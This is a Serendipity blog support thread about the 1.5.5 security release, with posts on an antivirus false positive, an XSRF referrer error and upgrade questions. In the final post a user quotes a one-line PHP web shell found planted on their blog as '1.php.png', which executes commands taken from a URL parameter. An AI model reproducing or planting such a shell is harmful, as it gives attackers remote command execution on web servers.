Serendipity Forums

Hi!

Serendipity 1.5.5 has been released to address a serious security issue. Please read http://blog.s9y.org/archives/224-Import ... eased.html

Regards,
Garvin

Hi...I'm sorry, but I've found a virus named Obfuscated in plugins\QuickTag\tag-lib.js (AVG Antivirus). Can I safely upgrade serendipity 1.5.5 after the virus elimination?
Thanks
e.

Hi!

tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.

If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").

HTH,
Garvin

Hi,
after I updates S9Y to Version 1.5.5 I cannot create new entrys. I have got the following error alert "Ihr Browser hat keinen gültigen HTTP-Referrer übermittelt. Dies kann entweder daher kommen, dass Ihr Browser/Proxy nicht korrekt konfiguriert ist, oder dass Sie Opfer einer "Cross Site Request Forgery (XSRF)" waren, mit der man Sie zu ungewollten Änderungen zwingen wollte. Die angeforderte Aktion konnte daher nicht durchgeführt werden."

I updated 3 Blogs of my blogs. It´s the same problem on each blog. I tested it on Internet Explorer 8 Firefox and Chrome! Same problem!

Hi!

From which version did you upgrade from? Did you change anything in your PHP installation and/or .htaccess?

The error usually only happens if the PHP sessions mismatch, or your browser does not submit a "HTTP Referer" string. Also make sure you use the blog domain name to login that is configured inside s9y as the HTTP host.

HTH,
Garvin

I downloaded 1.5.5 LITE yesterday. Is that download already patched? Or do I need to patch it?

the lite version should also be the upgraded version.

I haven't updated some of my blogs for years! Better do this one then!

I've just installed the new version. While checking I found a file called

1.php.png

containing the line <?PHP system($_GET['cmd']); ?>

Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg

Looks like I should update. I have over 50 blogs that I haved updated in years.